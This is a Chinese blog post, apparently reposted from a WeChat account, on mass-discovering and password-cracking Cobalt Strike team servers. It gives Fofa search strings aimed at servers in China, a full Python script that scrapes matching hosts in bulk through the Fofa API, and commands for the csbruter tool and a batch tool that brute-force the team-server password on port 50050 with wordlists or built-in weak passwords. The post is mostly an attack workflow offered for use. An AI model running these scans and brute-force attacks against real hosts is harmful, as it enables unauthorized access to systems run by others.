Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。
简单介绍及使用:
http://www.luodameinv.cn/2020/09/21/cobaltstrike简介、安装及简单使用/
资产搜集
Cobalt Strike团队服务器,Fofa搜索特征:
protocol=="cobaltstrike"&&country="CN" //搜索中国境内的Cobalt Strike团队服务器
利用网上很多脚本可以批量爬取资产,当然,得有fofa会员。
python3 fofa.py //需要填入自己的fofa的邮箱和key;
import requests
from lxml import etree
import random
import time
import urllib
import base64
import re
import json
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36",
}
#这里的代理IP需要自己去爬取或者添加
proxylist = [
{'HTTP': '112.84.54.35:9999'},
{'HTTP': '175.44.109.144:9999'},
{'HTTP': '125.108.119.23:9000'}
]
proxy = random.choice(proxylist)
def loadpage(email,key,targetsrting,end):
ip_list = []
#end = end +100
#url_reg = r'(https|http)?://'
for page in range(1,end+1):
print("正在爬取第"+str(page)+"页:")
target=base64.b64encode(targetsrting.encode('utf-8')).decode("utf-8")
#page="2" #翻页数
size="100" #每页返回记录数
url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+target+"&size="+size+"&page="+str(page)
print(url)
resp = requests.get(url)
data_model = json.loads(resp.text)
data_url=[]
save=open('ipresult.txt','a+')
for i in data_model['results']: #取结果列表
for j in i[0:1]: #取结果列表中的每个列表的url,需要IP则改为[1:2]
data_url.append(j)
for i in data_url:
save.write(i+"n")
print (i)
save.close()
#response = requests.get(fullurl,headers=headers,proxies=proxy).text #None proxy
#html = etree.HTML(response)
#print (response)
#req = html.xpath('//div[@class="fl box-sizing"]/div[@class="re-domain"]/a[@target="_blank"]/@href')
#result = 'n'.join(req)
#result=re.sub(url_reg, '',result)
#result, sep, tail = result.partition(':')
#print (result)
#with open(r'url.txt',"a+") as f:
# f.write(result+"n")
# print("----------------第"+str(page)+"页已完成爬取----------------"+'n')
if __name__ == '__main__':
email="xxx" #email
key="xxx" #key
targetsrting='protocol=="cobaltstrike"&&country="CN"&&header="200"' #搜索关键字
#targetsrting='"weblogic"' #搜索关键字
end = 100
loadpage(email,key,targetsrting,end)
time.sleep(1)
口令爆破
单个ip爆破:
https://github.com/ryanohoro/csbruter
例如
python3 csbruter.py -p 50050 ip wordlist.txt
//可指定密码字典,可以检测得比较全面
测试截图-略
批量弱口令爆破:
https://github.com/luodameinv/cobaltstrikebrute
ip.txt中放置需要爆破的服务端ip,
python3 cobaltstrikebrute.py
//改动了部分内容,增加对批量的CS服务端存活的端口进行批量弱口令爆破的功能,弱口令在代码中指定
原文始发于微信公众号(Oriental rose):Cobalt Strike团队服务器批量爆破
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论